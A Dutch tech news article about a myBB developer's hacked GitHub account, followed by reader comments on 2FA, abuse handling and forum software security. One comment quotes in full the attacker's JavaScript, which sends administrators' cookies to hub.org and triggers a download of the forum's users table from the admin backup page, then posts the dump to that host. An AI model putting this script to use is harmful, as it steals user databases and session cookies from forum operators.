Ontwikkelaar myBB-forumsoftware geeft waarschuwing na hack GitHub-account

Een developer van myBB waarschuwt beheerders die de de opensource-forumsoftware gebruiken voor mogelijke hackaanvallen. De waarschuwing volgt nadat het GitHub-account van de myBB-ontwikkelaar is gekraakt en er wijzigingen in de broncode zijn aangebracht.

myBB MyBB-ontwikkelaar 'Pirata Nervo' meldt op de website van de forumsoftware dat zijn GitHub-account onlangs is gekraakt. De aanvaller zou kans hebben gezien om, na te zijn ingelogd op GitHub, in de broncode van de opensource-forumsoftware wijzigingen aan te brengen.

Het zou gaan om kwaadaardige code waarmee de forumsoftware controleert of er updates beschikbaar zijn. De hacker heeft javascript-code geïnjecteerd waarmee back-ups van myBB-databases buitgemaakt kunnen worden.

Volgens Pirata Nervo heeft de aanvaller circa 16,5 uur toegang gehad tot zijn account. De ontwikkelaar waarschuwt websitebeheerders die myBB gebruiken om te controleren of zij mogelijk slachtoffer zijn geworden van de hacker. Daarbij moet met name gekeken worden naar de datum en tijd van de automatische back-up-functie van myBB.

IT-banen

Reacties (47)

Nordlys 16 november 2014 12:52

Hier zie je de commit die is gedaan:
https://github.com/mybb/m...16cf220a7243031234d264716

En de code die op hub.org/analytics.php staat:

document.getElementsByClassName('error')[0].style.display = 'none';

function runStuff() {
jQuery.noConflict();
jQuery.post('http://hub.org/analytics.php', { path: document.location.href, cookie: document.cookie }, null, 'text');

jQuery.get('index.php?module=tools-backupdb&action=backup', function(data) {
var table = jQuery(data).find('#table_select option[value$="users"]:not([value*="tapatalk"])').val();
var post_key = jQuery(data).find('input[name="my_post_key"]').val();
jQuery.post('index.php?module=tools-backupdb&action=backup', { my_post_key: post_key, tables: [ table ], filetype: 'plain', method: 'download', contents: 'data', analyzeoptimize: 0 }, function(data) {
jQuery.post('http://hub.org/analytics.php', { path: document.location.href, cookie: document.cookie, db: data }, null, 'text');
}, 'text');
});

}

if (typeof jQuery === 'undefined') {
var jq = document.createElement('script');
jq.src = 'http://code.jquery.com/jquery.js';
jq.onload = runStuff;
document.body.appendChild(jq);
} else {
runStuff();
}

[Reactie gewijzigd door Nordlys op 24 juli 2024 11:42]

CurlyMo @Nordlys • 16 november 2014 12:58

Als ik het goed lees probeert het dus een backup van je database te maken op het moment dat mybb controleert op een nieuwe versie en deze vervolgens naar een hub.org domein te sturen.

[Reactie gewijzigd door CurlyMo op 24 juli 2024 11:42]

rob12424 @CurlyMo • 16 november 2014 13:48

Wat ik mij dan afvraag zou het mogelijk zijn om hub.org een mail te sturen en daar duidelijk te maken dat een kwaadaardig persoon gebruik maakt van hun diensten: Reageren ze niet en dit gebeurt vaak bij meerdere gebeurtenissen dat de providers dan bijvoorbeeld hub.org gaan blocken en zo van internet buitensluiten?! Zo dat technisch en ethisch mogelijk zijn?

Crazy Harry @rob12424 • 16 november 2014 15:24

Ethisch is het sowieso mogelijk om hub.org hierom te blokkeren.
Sterker nog, ik denk dat eerst blokkeren, dan waarschuwen, de juiste gang van zaken is. Wanneer ze het probleem dan opgelost hebben, deblokkeren.

WhatsappHack

Netwerk en systeembeheer

@Crazy Harry • 16 november 2014 22:14

Neen, dat is een hele slechte gang van zaken.
Dat er misbruik gemaakt wordt kan nu eenmaal gebeuren. Men had ook een .js op een direct dropbox link kunnen gooien bijvoorbeeld, of het in een plaatje verstoppen, en zo zijn er nog tig opties.

Gewoon abuse melding maken, wachten op oplossing, klaar.
Het schiet niet op om meteen te blocken, zo'n hackert pakt dan wel weer een ander domein.
En het punt is eigenlijk dat de software dit probleem zou hebben moeten opvangen... Design flaw. Moet je geen andere slachtoffers voor gaan straffen.

Een ISP kan sowieso meestal niet zomaar zo'n site offline gooien trouwens, tenzij ze op shared hosting staan wellicht...

johnkeates @WhatsappHack • 17 november 2014 03:03

Waarom zouden ze dat niet kunnen? Switchpoort null-routen en klaar?

arjankoole @johnkeates • 17 november 2014 08:27

Waarom zouden ze dat niet kunnen? Switchpoort null-routen en klaar?

en de woede van de andere <x> klanten op die machine op je nek halen? nee. daar zijn procedures voor vanuit de industrie.

ISP A krijgt bericht, die bericht zijn klant B (eigenaar doos), die pakt het verder op met zijn klant C. Zomaar B offline rammen en daarmee niet alleen klant C offline halen, maar ook D t/m ZZZ, is bijzonder kwalijk.

johnkeates @arjankoole • 17 november 2014 15:59

Uh, waarom ga je andere klanten offline halen? Elke klant heeft toch z'n eigen switchpoort

of ga je al je klanten op een poort aansluiten? Bij abuse: eerst blackholen, daarna vragen stellen. Dat is de policy, en zo wordt ie ook uitgevoerd.

arjankoole @johnkeates • 17 november 2014 16:23

Uh, waarom ga je andere klanten offline halen? Elke klant heeft toch z'n eigen switchpoort of ga je al je klanten op een poort aansluiten? Bij abuse: eerst blackholen, daarna vragen stellen. Dat is de policy, en zo wordt ie ook uitgevoerd.

Wel eens van Vmware ESX of andere cloud toepassingen gehoord?

Dan doe je met een (serie,het zijn er doorgaans meer dan 1) switchpoort killen een hoop kwaad. Ik ga echt geen complete hostingprovider offline halen omdat hij 1 enkele klant heeft met een lekke drupal.

Crazy Harry @arjankoole • 17 november 2014 18:49

Bij Vmware kan je de virtuele machine toch platgooien

arjankoole @Crazy Harry • 17 november 2014 19:20

Bij Vmware kan je de virtuele machine toch platgooien

Tuurlijk, en daarmee 200 klanten van een klant benadelen omdat er eentje een lekke plugin heeft? kom op zeg.

Als we zelf toegang hebben tot de server ruimen we de zaak onmiddelijk op, maar dat is niet altijd het geval. Maar om dan 200 bedrijven te benadelen, dat is een veel te zware actie, alleen in zeer uitzonderlijke/ernstige gevallen gaan we daar toe over.

johnkeates @arjankoole • 17 november 2014 21:22

Wel eens van vSwitches, Open vSwitch, OpenFlow, brctl en virsh gehoord?

Dat zijn ook gewoon (virtuele) switches met switchpoorten, en die zitten als het goed is in je infrastructuur net zo goed achter een 'switchpoort uitzetten' knopje. Wat dacht je dan? Dat ik bedoelde dat je een managed hypervisor maar even uit de lucht moest trekken?

djvdorp @rob12424 • 17 november 2014 12:52

Gezien het feit dat Hub.org zichzelf profileert als Offshore VPS host, hebben die vaak privacy hoog in het vaandel staan en kan de inhoud van wat er gehost wordt zeer variëren.
Ik vermoed niet dat Hub.org dus überhaupt zou reageren, maar dat zijn just my 2 cents.

Dennisb1 17 november 2014 00:36

Wat het artikel vergeet te vermelden is dat dit alleen van toepassing op 1.8.x versie.
Ook de site van MyBB laat dit helaas na..

1.6.x gebruikers zijn niet geraakt door dit lek.
Daarom raad ik gebruikers altijd even aan om te blijven hangen op een vorige release tenzij het security fixes zijn

[Reactie gewijzigd door Dennisb1 op 24 juli 2024 11:42]

WhatsappHack

Netwerk en systeembeheer

@Dennisb1 • 17 november 2014 08:54

Maar het had even goed ook in die oudere versie kunnen zitten... En dan had blijven hangen je echt helemaal niets opgeleverd.

Op een oudere versie blijven zitten is dus totaal geen oplossing, alleen "in hindsight" is niet upgraden hier dus gewoon pure mazzel geweest... Achteraf praten is altijd zo lekker makkelijk.

Zegt totaal niet dat niet upgraden good practice is ofzo. Het had ook zo kunnen zijn dat enkel 1.6 vatbaar was en 1.8 door redesign niet. En dan zit jij daar met je niet geupgrade installatie omdat je dacht dat dat beter was... Nu komt t toevallig goed uit, de volgende keer pakt het andersom uit.

Nee sorry, niet upgraden vind ik een onzin "oplossing" en is niet aan te raden uit een false sense of security oogpunt. Het is nu niets meer dan pure mazzel als je niet geupgrade had. Niets meer, niets minder.

Bedenk wel dat dit namelijk enkel mogelijk was door die github kraak. Dat had dus naar elke versie kunnen doorsijpelen als ze t zelfde mechanisme voor updates gebruikten... Wel of niet upgraden is dan niet eens relevant. Puur achteraf captain hindsight ge***

[Reactie gewijzigd door WhatsappHack op 24 juli 2024 11:42]

Ramon 16 november 2014 12:44

Dan doe je toch gewoon een reverse commit en klaar?

Niekfct @Ramon • 16 november 2014 12:55

Kun je doen. En morgen weer, en overmorgen nog een keer. Totdat al je gebruikers overgestapt zijn op een andere dienst omdat je niet meer te vertrouwen bent.

Ramon @Niekfct • 16 november 2014 13:08

Na het lezen van het bron artikel is mij het volgende duidelijk geworden

1) MyBB gebruikt in zijn software github als update mechanisme, er wordt dus door een MyBB installatie een call gedaan NAAR een github pagina om te kijken of er een nieuwe versie beschikbaar is
2) De hacker heeft een nieuwe versie op github gezet die hem in staat stelt om van ALLE MyBB installaties een back up te maken
3) de ontwikkelaar had geen two-factor auth aanstaan.

Dus inderdaad is het niet zo simpel als alleen een reverse commit doen maar het zou niet verkeerd zijn.

Natuurlijk moet je op github gewoon altijd two-factor auth aanzetten, dan gebeurt dit soort shit niet.

Zidane007nl @Ramon • 16 november 2014 16:55

MyBB doet niet een call naar GitHub, maar naar de website van MyBB (http://www.mybb.com/version_check.php). Die geeft XML terug en die wordt gewoon teruggegeven aan de gebruiker zonder check (https://github.com/mybb/m...in/modules/home/index.php).

SuperDre @Ramon • 16 november 2014 17:37

Klopt, en dat zal ook gedaan worden, maar in de tussentijd zijn er wel mogelijk mensen geweest die de aangepaste code gebruikt hebben voor hun build, en daarom moeten die dus wel gewaarschuwd worden.. Als jij weet dat jij in die tijd geen code hebt binnengehaald en hebt gebruikt hoef je je ook nergens zorgen om te maken...

moijamie 16 november 2014 12:46

Ik ben benieuwd hoe het github account is gehacked iemand info daar over ?

Wim-Bart @moijamie • 16 november 2014 13:29

Heel simpel. Gewoon zelfde accountnaam/emailadres/password op andere site gebruikt? Of malware op zijn machine? Of op 10-tallen andere methodieken waarmee je password/login kan onderscheppen. Zo iets is vrij simpel zonder 2-factor authenticatie.

blouweKip @moijamie • 16 november 2014 17:03

Klinkt niet echt als een hack, volgens mij is gewoon zijn password achterhaald buiten github om.
Omdat hij geen 2 factor authentication gebruikte kon de cracker vervolgens zelf dingen aanpassen.

Niekfct 16 november 2014 12:47

Zo zie je maar weer dat Two Factor Authentication er niet voor niets is. Zeker bij een dienst als Github waarbij mensen op jouw naam vertrouwen kan het levensgevaarlijk zijn wanneer iemand anders toegang tot jouw account heeft.

SuperDre @Niekfct • 16 november 2014 17:38

two factor authentication is nog steeds geen zekerheid...

kritischelezer @SuperDre • 17 november 2014 00:50

Correct, want de server van Github kan ook worden betreden door mensen die andere intenties hebben dan de gemiddelde open source aanhanger.

Of de computer waarmee wordt ingelogd door de gebruiker van Github.

We moeten even wachten op nieuws: Wetenschappers versturen kwantuminformatie naar meer dan één ontvanger

a=b en er is niemand tussen a en b om dit te onderscheppen.

Yzord 16 november 2014 17:06

Een uiterst kwalijke zaak en bewijst maar weer eens dat 2FA zo langzamerhand verplicht gesteld moet gaan worden voor dat soort sites. Deze aktie beschaamt de developer en zou zelfs de developer een naam kunnen geven als onbetrouwbaar wat de verdere ontwikkeling van software in gevaar zou kunnen brengen (de bekende handdoek in de ring).

Zidane007nl 16 november 2014 17:21

Ik vind dit wel een groot beveiligingslek bij MyBB ...

Blijkbaar worden de aanpassingen op GitHub op de website van MyBB doorgevoerd zonder te controleren op gekke dingen. En de call die MyBB doet naar de server van MyBB wordt gewoon doorgegeven naar de gebruiker zonder eerst afgevangen te worden. Daar hebben ze nu wel een issue voor aangemaakt (https://github.com/mybb/mybb/issues/1617).

Verwijderd 17 november 2014 09:44

Ik vraag mij af ik draai MYBB en die vraagt om een update MyBB 1.8.2 (1802).

kan ik dit nu veilig doen of toch nog maar even wachten ?

WhatsappHack

Netwerk en systeembeheer

@Verwijderd • 17 november 2014 10:31

De commit is reversed en ze waren bezig met een patch. Upgraden moet gewoon veilig kunnen nu.

Je moet wel de instructies volgen en even controleren of je databeest niet gejat is.

Verwijderd @WhatsappHack • 17 november 2014 13:42

Gecontroleerd en niet gejat.

Thnx voor de Response

sjun 16 november 2014 14:16

Gelukkig is er phpBB3.x

lifeguard @sjun • 16 november 2014 17:00

Alsof die wel 100% veilig is. Ook phpBB heeft zijn gloriedagen wel gehad, en is lang zo poulair niet meer.
Lijkt erop alsof al die ontwikkelaars van gratis forumsoftware geen zin meer hebben om door te ontwikkelen.
phpBB duurde vrij lang voor een sumiere update
myBB zelfde als phpBB
smf, hoe lang wachten ze daar al op een update naar 2.1
en zo kan ik wel even doorgaan.

SuperDre @lifeguard • 16 november 2014 17:40

Maarja, aan de andere kant kun je ook stellen, waarom door ontwikkelen als wat er staat al perfect werkt..
Maar dat is gewoon een algemeen probleem met 'gratis'/'open source' projecten, de kans is altijd aanwezig dat ontwikkelaars er geen zin meer in hebben..

Maar je kunt dan ook stellen, omdat het 'open source' is, heb je hun toch niet nodig, dus als het je te lang duurt ga je toch zelf met de source aan de slag............

lifeguard @SuperDre • 17 november 2014 14:59

Mee eens. Feit is wel, dat er voor zowel phpBB, myBB, en smf vele devvers zijn die gewoon door zullen gaan gelukkig.. Dus ik zie die niet ineens stoppen

WhatsappHack

Netwerk en systeembeheer

@lifeguard • 16 november 2014 22:21

SMF heeft er altijd heel erg lang over gedaan om nieuwe versies te produceren. Gaan altijd jaren overheen.
Maar als t dan klaar is, dan staat er ook een zeer veilig en extreem stabiel product klaar.

Ik persoonlijk vind dat prettiger dan dat "rolling release" achtige gelazer waarbij iedereen maar snel, snel, snel wil releasen ongeacht of het uitgebreid getest en getweaked is...
Maar ieder z'n ding; er is geen "beste software" of "beste methode", er is enkel "het beste voor mij"; en die afweging is voor iedereen anders.

SMF 2.1 komt trouwens zeer binnenkort uit.
Kwestie van dagen gok ik.

lifeguard @WhatsappHack • 17 november 2014 15:00

Mee eens. Heb zelf SMF heel lang gebruikt, en het werkte dan ook gewoon altijd goed.
Waar heb je die info vandaan dat 2.1 zeer binnenkort uitkomt? Kan het zo 1 2 3 niet vinden. Heb wel zin om SMF 2.1 te gaan proberen

WhatsappHack

Netwerk en systeembeheer

@lifeguard • 24 november 2014 05:16

Intern. Is intussen released.

(Beta)

lifeguard @WhatsappHack • 24 november 2014 20:17

Inderdaad. Ben er nu 2 dagen mee aan het "spelen" en het zit wederom goed in elkaar. Keurig

WhatsappHack

Netwerk en systeembeheer

@sjun • 16 november 2014 22:17

phpBB is in t verleden ook vaak in de problemen gekomen...

De veiligste gratis software voor communities is Simple Machines Forum (SMF). Onverslaanbaar in security track record, nog nooit werkelijk "severe" gaten gehad, enkel wat random onzin of waarvoor je sowieso al administrator toegang moest hebben om iets voor elkaar te krijgen...

De veiligste betaalde software voor communities is XenForo. Die heeft nagenoeg wellicht zelfs nog een nét iets betere trackrecord met aantal CSV's en severity scores dan SMF.

Met enig van die 2 stukken software kan je echter nooit mis zitten als je zeer veilige software wilt hebben voor je site. myBB en phpBB kunnen geen van beiden tippen aan SMF noch XF als t op beveiliging aankomt.

sjun @WhatsappHack • 23 november 2014 18:24

Voor mij voldoet phpbb 3.x. Ik heb nog geen hacks of andere onoverkomenlijke vervelende zaken bij de hand gehad. Mocht dat niet meer zo zijn dan zal ik in elk geval je suggestie meenemen.

Zidane007nl @sjun • 16 november 2014 17:27

Waar net pas de mogelijkheid is toegevoegd om plugins makkelijk te installeren? No thanks ...

Verwijderd @Obelink • 16 november 2014 20:56

En niet alles automatisch updaten :-)

lifeguard @Verwijderd • 17 november 2014 15:01

Inderdaad. Dit is een instelling die veel beginnelingen gebruiken binnen Installatron. Wele ik zelf altijd af zou raden

WhatsappHack

Netwerk en systeembeheer

@Obelink • 16 november 2014 22:24

Ja, dat dacht die hacker dus ook...

Sorry, maar ik zie niet in hoe die tip hier relevant is... De besmette sites zijn namelijk niet gesloopt, enkel de data is gejat. Als je zelf ook een backup hebt maakt dat nog steeds totaal geen verschil, dus hoe heeft een backup maken hier enig nut/effect...? Hoe is het uberhaupt relevant? Behalve voor de hacker dan natuurlijk, die is blij met zijn gestolen backups.

.oisyn Moderator Devschuur® @Obelink • 17 november 2014 01:24

Wat? Liggen mijn persoonsgegevens op straat? Geeft niets, ik heb toch een backup.

Op dit item kan niet meer gereageerd worden.

Ontwikkelaar myBB-forumsoftware geeft waarschuwing na hack GitHub-account

Lees meer

IT-banen

Reacties (47)

Sorteer op:

Weergave: